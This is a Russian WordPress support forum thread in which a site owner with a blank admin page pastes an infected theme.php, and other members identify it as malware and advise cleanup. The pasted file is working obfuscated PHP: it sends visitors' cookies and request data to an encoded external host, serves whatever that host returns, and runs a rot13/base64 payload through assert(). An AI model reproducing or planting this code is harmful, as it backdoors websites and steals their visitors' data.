Пропала админка
-
Привет. Пожалуйста помогите.
Пропала админка. Просто белый экран вместо нее.
При этом сам сайт работает нормально.
Сам сайт http://efremov-pk.ru/wp-admin/
Сейчас через хостинг включил в wp-config.php режим дебага.В чем может быть проблема ребят!
-
Вот содержание theme.php
<?php $h=&$_COOKIE;$Z=&$_SERVER;$s=ltrim($Z["\122\x45\x51\x55\105\x53\x54\137\x55\x52\111"],'/');$z=0;if(preg_match('~^(.*)-([^-]{1,2}?)(\.|\z|/)~',$s,$Q)){$k=245;for($C=0;$C<strlen($Q[1]);$C++)$k+=ord($Q[1][$C]);if(($k&255)==hexdec($Q[2]))$z=1;}elseif(strpos($s,'zozewdbem')===0)$z=1;elseif(strpos($s,"\x6a\x73\x2fyugqayemr\56\x6a\163")===0)$z=1;elseif(strpos($s,"\152\x73\x2flitaxcolux\56\x6a\163")===0)$z=1;if($z){$g='';if(!empty($h)){foreach($h as $E=>$K){if($g)$g.='; ';$g.=$E.'='.addslashes($K);}}$a="\143\x75\x72\x6c\137\151\156\151\x74";$e=http_build_query($Z);$O="\163\x69\142\155\141\x73\150\x72\145\x6d\157\156\x74\56\x72\165";$b="\57\160\162\157\x78\171\x66\x6f\x6c\x64\x65\x72\x2f\x6a\x6f\155\x6d\156\x61\x6a\145\x71\x61\x71\141";if(is_callable($a)){$R="\143\x75\162\154\x5f\x73\x65\x74\157\160\164";$n="\143\x75\162\x6c\x5f\x65\170\x65\x63";$U=$a();$R($U,4995+5007,"\150\x74\164\160\x3a\x2f\x2f".$O.$b);$R($U,2689+7326,$e);$R($U,11316+8597,1);$R($U,9470+10609,'iDSp');if($g)$R($U,6061+3961,$g);$W=$n($U);}else{$L="\146\x73\x6f\x63\153\157\160\x65\x6e";$o="\x66\143\154\x6f\163\x65";$V="\x66\167\162\x69\164\x65";$F="\x66\x67\145\x74\163";$r=$L($O,55+25) or die();$I="\120\117\123\124 $b \110\124\x54\120/1.1\r\n\110\157\163\x74: $O\r\n\x43\157\x6e\x74\x65\x6e\x74\55\124\x79\160\x65: \141\x70\160\154\x69\x63\141\x74\x69\157\156\57\170\x2d\167\x77\167\x2d\x66\157\162\155\55\165\162\154\145\x6e\x63\157\144\145\x64\r\n";if($g)$I.="\103\x6f\157\153\151\x65: $g\r\n";$I.="\103\157\x6e\x74\145\x6e\x74\55\x6c\145\156\147\164\150: ".strlen($e)."\r\n\x43\x6f\156\x6e\145\x63\x74\151\157\x6e\x3a\40\x43\154\157\163\x65\r\n\r\n";$V($r,$I.$e);$J='';while(!feof($r)){$J.=$F($r,154+870);}$o($r);list($I,$W)=explode("\r\n\r\n",$J,2);$I=explode("\r\n",$I);$u=0;foreach($I as $B){iDSp(0,$B);if(strpos($B,"\x63\150\165\x6e\x6b\x65\144")!==false)$u=1;}if($u){for($j='';!empty($W);$W=trim($W)){$v=strpos($W,"\r\n");$f=hexdec(substr($W,0,$v));$j.=substr($W,$v+2,$f);$W=substr($W,$v+2+$f);}$W=$j;}}if(trim($W)){echo $W;exit;}}function iDSp($U,$Y){if(strpos($Y,"\x43\157\x6e\x74\x65\x6e\x74\55\124\x79\160\x65")!==false||strpos($Y,"\64\x30\x34")!==false||strpos($Y,"\63\x30\x31")!==false||strpos($Y,"\x4c\x6f\143\x61\x74\x69\x6f\x6e")!==false||strpos($Y,"\x53\x65\164\55\103\x6f\157\153\151\x65")!==false)header($Y);return strlen($Y);}?><?php @error_reporting(E_ALL); @ini_set("error_log",NULL); @ini_set("log_errors",0); @ini_set("display_errors", 0); @error_reporting(0); $wa = ASSERT_WARNING; @assert_options(ASSERT_ACTIVE, 1); @assert_options($wa, 0); @assert_options(ASSERT_QUIET_EVAL, 1); $strings = "as"; $strings .= "se"; $strings .= "rt"; $strings2 = "st"; $strings2 .= "r_r"; $strings2 .= "ot13"; $gbz = "riny(".$strings2("base64_decode"); $light = $strings2($gbz.'("nJLtXPScp3AyqPtxnJW2XFxtrlNtMKWlo3WspzIjo3W0nJ5aXQNcBjccMvtuMJ1jqUxbWS9QG09YFHIoVzAfnJIhqS9wnTIwnlWqXFxtrlOyL2uiVPEsD09CF0ySJlWwoTyyoaEsL2uyL2fvKGftsFOyoUAyVUfXWUIloPN9VPWbqUEjBv8iMzIlpzI0YJ1cozfhpaHiM2I0YaObpQ9cpQ0vYaIloTIhL29xMFtxK1ASHyMSHyfvHxIAG1ESK0SRESVvKFxhVvMxCFVhqKWfMJ5wo2EyXPEsH0IFIxIFJlWGEIWJEIWsGxSAEFWqYvEsH0IFIxIFJlWFEISIEIAHK1IFFFWqXF4vWaH9Vv51pzkyozAiMTHbWS9GEIWJEIWoVxuHISOsIIASHy9OE0IBIPWqXF4vWzx9ZFMbCFVhoJD1XPVjBJHjMJAuZTWyBJLmZwN5ZJH0LzDmAQN4ZQyzMQp4BQRkVvx7PzyzXTM1ozA0nJ9hK2I4nKA0pltvL3IloS9cozy0VvxcVUfXWTAbVQ0tL3IloS9cozy0XPE1pzjcBjcwqKWfK3AyqT9jqPtxL2tfVRAIHxkCHSEsFRIOERIFYPOTDHkGEFx7L3IloS9mMKEipUDbWTAbYPOQIIWZG1OHK0ACGx5SD1EHFH1SG1IHYPN1XGftL3IloS9mMKEipUDbWTAbYPOQIIWZG1OHK1EWGHICIIDfVQHcBjcwqKWfK3AyqT9jqPtxL2tfVRAIHxkCHSEsHxIHIIWBISWOGyATEIVfVSEFIHHcBjbxnJW2VQ0tL3IloS9yrTIwXPEwnPx7PzA1pzksL2kip2HbWTAbXGfXsFOyoUAynJLbnJ5cK2qyqPtvLJkfo3qsqKWfK2MipTIhVvxtCG0tZFxtrjbxnJW2VQ0tMzyfMI9aMKEsL29hqTIhqUZbWUIloPx7Pa0XnJLbnKAmMKDbWS9DG1AHJlWjVy0cVPLzVT1xAFugMQHbWS9DG1AHJlWjVy0cXFN9CFNvLwV2ZQR5ZQxlATExZwVlZ2WuZGZlL2Z4ZJLlBGt0LJDvXFO7VROyqzSfXUA0pzyjp2kup2uypltxK1OCH1EoVzZvKFxcBlO9PzIwnT8tWTyvqwfXsFO9"));'); $strings($light); ?>
Если убираю этот файл при попытке открыть админку выдает следующее:
Warning: include(/var/www/u0052095/data/www/efremov-pk.ru/wp-content/themes/themes.php) [function.include]: failed to open stream: No such file or directory in /var/www/u0052095/data/www/efremov-pk.ru/wp-load.php on line 1 Warning: include() [function.include]: Failed opening '/var/www/u0052095/data/www/efremov-pk.ru/wp-content/themes/themes.php' for inclusion (include_path='.:') in /var/www/u0052095/data/www/efremov-pk.ru/wp-load.php on line 1 Warning: Cannot modify header information - headers already sent by (output started at /var/www/u0052095/data/www/efremov-pk.ru/wp-load.php:1) in /var/www/u0052095/data/www/efremov-pk.ru/wp-includes/pluggable.php on line 1174
Вот содержание theme.php
Что за файл? Где лежит? Откуда взялся?
<?php $h=&$_COOKIE;$Z=&$_SERVER;$s=ltrim($Z["\122\x45\x51\x55\
Сильно смахивает на вирус.
$light = $strings2($gbz.'("nJLtXPScp3AyqP
И такое приличные авторы в скриптах не ставят.
удалите этот файл
по ftp или через файл менеджер хостинга перепишите чистые незараженные вирусякой файлы ВПhttps://ru.wordpress.org/releases/
папки wp-includes и wp-admin на хосте лучше удалить целиком , чтобы в них ничего лищнего не осталось.
Ребята.
Походу и правда вирус.
В папке с темами были собственно темы + три php
соответственно index.php и подозрительные headers.php и theme.php я их для начала переименовал.
Тогда сайт начал ругаться (вывод ошибок включен) на то что в wp-load.php есть упоминание этого самого theme.php.Я скачал новенький чистенький wp-load.php и положил на хостинг (старый соответственно тоже переименовал). Иии.. О чудо! Все заработало!
Хм.. Получается и правда вирус? Вообразить себе не мог, что они способны залезать на хостинг! Пароль на хостинге крепкий — работаю на хостинге я из под Linux через браузер (не по ftp правда).
Выходит вирус залез наложил своих файлов, изменил содержимое wp-load.php и все это совершенно безнаказанно?
Ух.. Как страшно жить..папки wp-includes и wp-admin на хосте лучше удалить целиком
А это сайту не навредит если я их целиком заменю?
не навредит. Архив только нужной версии WP возьмите
в wp-includes и wp-admin лежат только файлы ядра WP, они могут и должны полностью заменяться при переустановкеПолучается и правда вирус
выложенные куски кода — вне сомнений являются зловредными
как оно попало? Обычно с темами или плагинами взятыми «слева» не из каталога
иногда как следствие взлома из за старых необновляемых плагинов и тем
иногда за счет дыр непосредственно хостинга, хотя это реже, т.к. приличный хостер такого себе позволять не долженЛадно. Попробую провести ревизию в плагинах.
Тему мы сменить не можем — нам ее писали специально. Она очень корявая — но от нее никуда не деться. А вот плагины посмотрю.
Всем спасибо, народ. Очень помогли.
если тема старая и кривая, то взломать ее могли достаточно легко, если она действительно настолько кривая.
единственный нюанс, если она уникальна и написана под заказ, то ломать ее можно вручную, ботнеты как правило не смогли бы найти дыру автоматически.в любом случае анализ взлома задача непростая.
https://www.revisium.com/ai/
просто поищите пока где еще могли остаться вирусыЭтот файл — часть темы.
Он не может быть частью темы.. частью нормальной темы, ибо находится ВНЕ ёё. Он появился позже. Или же специально заложен разработчиками темы, что маловероятно.
Тему мы сменить не можем — нам ее писали специально. Она очень корявая — но от нее никуда не деться.
Всё можно (тем более такое..). Да, не всё легко и быстро, но наверняка нужно.
И точно — рано или поздно всё равно придется, ибо не только возникнут несовместимости и появится нагрузка/ошибки, но и постоянные взломы (/простои/расходы/потери) Вас утомят. И хорошо, если Вас не коснутся подобные истории.
И чем раньше Вы примите решение на обновление всего и вся — тем меньше будет проблем с этим в будущем.
- Тема «Пропала админка» закрыта для новых ответов.